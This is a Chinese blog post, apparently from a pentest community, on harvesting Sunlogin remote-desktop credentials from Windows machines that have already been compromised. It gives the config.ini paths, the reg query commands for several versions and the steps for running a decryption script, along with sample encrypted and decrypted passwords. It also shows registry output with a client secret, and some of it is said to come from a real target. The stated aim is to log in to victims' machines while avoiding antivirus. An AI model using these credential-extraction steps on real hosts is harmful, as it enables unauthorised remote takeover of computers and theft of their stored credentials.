低版本向日葵本机识别码和验证码提取

更新时间：2022.06.03

祝大家端午节快乐！

本文首发乌鸦安全知识星球

1. 介绍

向日葵远程控制是一款阳光的远程控制及远程桌面产品，获得微软认证，界面友好，简单易用，安全放心，体积小巧，易快速安装使用。配合向日葵开机棒，还可支持数百台主机的远程开机，实现远程开机与控制一体化。通过向日葵，你可以在世界上任何地点、任何网络中，轻松实现手机控制手机，手机控制电脑，电脑控制电脑。

在很多场景中，拿到了Windows下的权限之后，可能由于杀软或者其他的情况下，无法登录目标PC，但是当目标的电脑中安装了向日葵的时候，可以通过读取向日葵本机识别码和验证码，直接登录。

2. 本机识别码和验证码识别

本文主要参考于

https://github.com/wafinfo/Sunflower_get_Password

向日葵配置的识别码和验证码的读取原理是根据向日葵配置文件路径，分别提取

config.ini

参数里面

encry_pwd

(本机验证码)，对其中的验证码进行解密。
作者提供的方案中，老版本主要是通过配置文件路径，新版本通过查询注册表查询来实现的：
老版本通过配置文件来查询

安装版：C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

便携版(绿色版)：C:\ProgramData\Oray\SunloginClient\config.ini

新版本通过注册表来查询

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

在作者的方案中，对于老版本和新版本的向日葵两种方法都提供了解决方案，但随着向日葵的更新，目前最新版本已经无法解密，在这里我以几个不同的版本为例来分析下。

2.1 老版本向日葵（安装版）

测试版本：

SunloginClient_10.3.0.27372

安装版本
测试版本：

SunloginClient_11.0.0.33826_x64

安装版本


这个路径的文件和作者文中的路径稍微有些不同：
作者的：

C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

而实际上目前我的文件在：

C:\Program Files (x86)\Oray\SunLogin\SunloginClient

所以对于老版本的话，路径应该有两种：

向日葵默认配置文件路径:

安装版64位：C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
安装版32位：C:\Program Files (x86)\Oray\SunLogin\SunloginClient\config.ini

在这里读出

config.ini

文件：

然后使用作者的脚本来解密：
安装

 pip3 install unicorn

直接运行：

python3 SunDecrypt.py

此时加密之后的验证码：

2EIvI9VEuOI=

认证码：

583247734

此时解出来验证码为

284D0Q

登录一下试试，登录成功：

2.2 次新版本向日葵

最新版向日葵已经无法通过作者的方法来获取信息，这里提供的是一个次新版，版本号不详了，本来我想着从网上找的，但是没找到，所以这里直接使用实战目标里面的截图来说明下：
次新版本向日葵目前已经无法通过默认路径的方法来获取配置信息，但是在作者的github中也说了，可以通过注册表查询的方式来获取其中的信息：

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

执行之后的结果：

2.3 更老的版本

在更老的向日葵版本中，可以通过查询

config.ini

直接获取明文的验证码

向日葵默认配置文件路径:

安装版64位：C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
安装版32位：C:\Program Files (x86)\Oray\SunLogin\SunloginClient\config.ini

2.4 最新版

目前向日葵最新版已经无法通过上述方法查到信息，在这里稍微修改之后，还是能查到加密之后的认证码和识别码：

通过注册表可以查到：

reg query HKEY_CURRENT_USER\SOFTWARE\Oray\SunLogin\SunloginClient\

C:\Users\crow>reg query HKEY_CURRENT_USER\SOFTWARE\Oray\SunLogin\SunloginClient\

HKEY_CURRENT_USER\SOFTWARE\Oray\SunLogin\SunloginClient
    new_clientId    REG_SZ    574c0f98-63bc-474f-8e90-bb66d6577e19
    secret    REG_SZ    8g!4#*6bv1qiO2ydbHqx?wzKjjVxZp*$
    machine_code    REG_SZ    hcKO8pBb5zUXwkDdxOKUICvEAJUFCPacIHMy0Al4yzkrBCtbmRk6w6tgQHJ4MWdEQUvDNPKVDFY=

但是在这里已经无法进行解密，后续如果有大佬能够研究下的话，欢迎一起学习。